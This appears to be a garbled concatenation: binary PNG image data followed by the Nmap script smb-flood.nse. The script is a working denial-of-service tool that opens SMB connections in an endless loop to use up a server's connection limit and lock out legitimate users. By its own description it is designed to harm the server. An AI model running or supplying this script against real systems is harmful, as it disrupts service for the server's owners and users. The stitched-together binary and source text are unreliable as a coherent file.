PNG  IHDR;IDATxܻn0K )(pA 7LeG{ §㻢|ذaÆ 6lذaÆ 6lذaÆ 6lom$^yذag5bÆ 6lذaÆ 6lذa{ 6lذaÆ `}HFkm,mӪôô! x|'ܢ˟;E:9&ᶒ}{v]n&6 h_tڠ͵-ҫZ;Z$.Pkž)!o>}leQfJTu іچ\X=8Rن4`Vwl>nG^is"ms$ui?wbs[m6K4O.4%/bC%t Mז -lG6mrz2s%9s@-k9=)kB5\+͂Zsٲ Rn~GRC wIcIn7jJhۛNCS|j08yiHKֶۛkɈ+;SzL/F*\Ԕ#"5m2[S=gnaPeғL lذaÆ 6l^ḵaÆ 6lذaÆ 6lذa; _ذaÆ 6lذaÆ 6lذaÆ RIENDB` local smb = require "smb" local stdnse = require "stdnse" local table = require "table" description = [[ Exhausts a remote SMB server's connection limit by by opening as many connections as we can. Most implementations of SMB have a hard global limit of 11 connections for user accounts and 10 connections for anonymous. Once that limit is reached, further connections are denied. This script exploits that limit by taking up all the connections and holding them. This works better with a valid user account, because Windows reserves one slot for valid users. So, no matter how many anonymous connections are taking up spaces, a single valid user can still log in. This is *not* recommended as a general purpose script, because a) it is designed to harm the server and has no useful output, and b) it never ends (until timeout). ]] --- -- @usage -- nmap --script smb-flood.nse -p445 -- sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139 -- -- @output -- n/a ----------------------------------------------------------------------- author = "Ron Bowes" copyright = "Ron Bowes" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"intrusive","dos"} dependencies = {"smb-brute"} hostrule = function(host) return smb.get_port(host) ~= nil end action = function(host) local states = {} repeat local status, result = smb.start_ex(host, true, true) if(status) then table.insert(states, result) -- Keep the result so it doesn't get garbage cleaned stdnse.print_debug(1, "smb-flood: Connection successfully opened") stdnse.sleep(.1) else stdnse.print_debug(1, "smb-flood: Connection failed: %s", result) stdnse.sleep(1) end until false end